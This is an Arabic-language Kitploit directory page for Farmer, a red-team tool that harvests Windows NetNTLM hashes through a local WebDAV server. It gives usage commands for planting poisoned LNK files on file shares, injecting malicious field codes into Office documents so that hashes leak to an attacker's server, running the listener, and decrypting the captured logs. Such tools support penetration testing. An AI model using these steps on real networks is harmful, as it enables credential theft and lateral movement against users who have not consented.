Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/mdsecactivebreach/farmer
أدوات التصيدهجمات كلمات المرورالحركة الجانبيةجمع المعلوماتأمن الويباختبار الاختراقالفريق الأحمر
GitHubmdsecactivebreach/farmer

Farmer

يجمع تجزئات NetNTLM في نطاقات Windows عبر خادم WebDAV محلي، مع تسميم ملفات LNK وحقن كود الحقل في مستندات Office للحركة الجانبية والتقاط بيانات الاعتماد.

عرض المستودع
42760منذ 5 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Farmer

المؤلف: @domchell

نظرة عامة

أردت أن أكون مزارعًا، لذا بدأت في حصاد الـ hashes

Farmer هو مشروع لجمع تجزئات NetNTLM في نطاق Windows. يحقق Farmer ذلك عن طريق إنشاء خادم WebDAV محلي يتسبب في قيام WebDAV Mini Redirector بالمصادقة من أي عملاء متصلين.

لكي ينجح Farmer، يجب أن يكون العملاء قادرين على الاتصال بخادم WebDAV المحلي. من الأمور التي قد تمنع ذلك تقسيم الشبكة و/أو جدار حماية Windows. تأكد من التحقق من هذه أولاً (تلميح Seatbelt WindowsFirewall).

نشر المحصول

يتضمن Farmer وحدة فرعية لأداة Crop، يمكن استخدام هذه الأداة لإنشاء ملفات LNK التي تبدأ اتصال WebDAV عند التصفح إلى مجلد يتم تخزين LNK فيه حيث ستحاول عرض الأيقونة المخزنة.

مفهوم الهجوم هو أنه يجب عليك استخدام Crop لتسميم مشاركات الملفات المطلوبة بملف LNK الذي يشير إلى خادم Farmer WebDAV.

على سبيل المثال:

root@kitploit:~
crop.exe \\fileserver\Common crop.lnk \\workstation@8888\harvest \\workstation@8888\harvest

عندما يتصفح أي مستخدم إلى \fileserver\Common، سيحاول المستكشف استرداد الأيقونة من خادم Farmer WebDAV وبذلك يقوم بإرسال تجزئة NetNTLM الخاصة بالمستخدم.

تسميد المحصول

يتضمن Farmer وحدة فرعية أخرى لأداة Fertiliser، يمكن استخدام هذه الأداة لتسميم مستندات Office (حاليًا docx فقط) برمز حقل ضار. يؤدي ذلك إلى تحليل رمز الحقل عند فتح المستند وسيؤدي إلى تسريب التجزئة إلى خادم WebDAV الذي تختاره :)

على سبيل المثال:

root@kitploit:~
Fertiliser.exe \\fileserver\important.docx http://workstation:8888/foo "Update required"

الزرع

سيستمع Farmer على منفذ يحدده المستخدم، لعدد من الثواني ويكتب المخرجات إلى نظام الملفات إذا لزم الأمر:

الاستخدام:

root@kitploit:~
farmer.exe <port> [seconds] [output]

إذا لم يتم تحديد ثوانٍ، أو تم تعيينها على 0، سيعمل Farmer إلى أجل غير مسمى، على سبيل المثال:

root@kitploit:~
farmer.exe 8888 0 c:\windows\temp\test.tmp

لتشغيل Farmer لمدة دقيقة واحدة على المنفذ 8888، قم بما يلي:

root@kitploit:~
farmer.exe 8888 60

إذا كنت ترغب في كتابة سجل Farmer إلى نظام الملفات، يمكنك تشفير ملف السجل باستخدام AES باستخدام المفتاح المحدد في Config.key وضبط قيمة encrypt المنطقية على true (الافتراضي false).

يمكن فك تشفير ملف السجل باستخدام أداة HarvestCrop، على سبيل المثال:

root@kitploit:~
harvestcrop.exe c:\windows\temp\test.tmp farmer
تنزيل الأداة